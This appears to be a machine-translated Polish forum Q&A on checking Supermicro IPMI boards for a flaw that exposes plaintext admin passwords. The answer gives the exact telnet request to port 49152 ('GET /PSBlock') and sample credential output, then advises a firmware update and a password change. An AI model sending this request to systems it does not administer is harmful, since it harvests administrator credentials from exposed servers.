Jak sprawdzić, czy moje Supermicro IPMI jest zagrożone hasłem administratora w postaci zwykłego tekstu przez Internet?

Mam kilka serwerów Supermicro z uruchomionym IPMI i jak opisano w tym blogu ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) istnieje krytyczna luka w zabezpieczeniach Uzyskaj zwykłe hasła administratora z dowolnej zdalnej lokalizacji.

Jak sprawdzić, czy moja płyta główna serwera jest zagrożona?

Po prostu telnet na adres IPMI IPMI na porcie 49152 i wykonaj określone żądanie GET. Powinieneś dostać swoich użytkowników i hasła, jeśli jesteś zagrożony.

telnet server.example.com 49152

Po połączeniu zapytaj GET /PSBlocki obejrzyj wyniki, powinno to wyglądać mniej więcej tak:

Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock

Odpowiedź:

=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??

Aby rozwiązać ten problem, zaktualizuj oprogramowanie wewnętrzne IPMI do najnowszej wersji. Oprogramowanie układowe jest specyficzne dla twojego kontrolera IPMI, więc powinieneś dostać go na stronie internetowej Supermicro.

Następnie po aktualizacji oprogramowania zmień swoje hasła .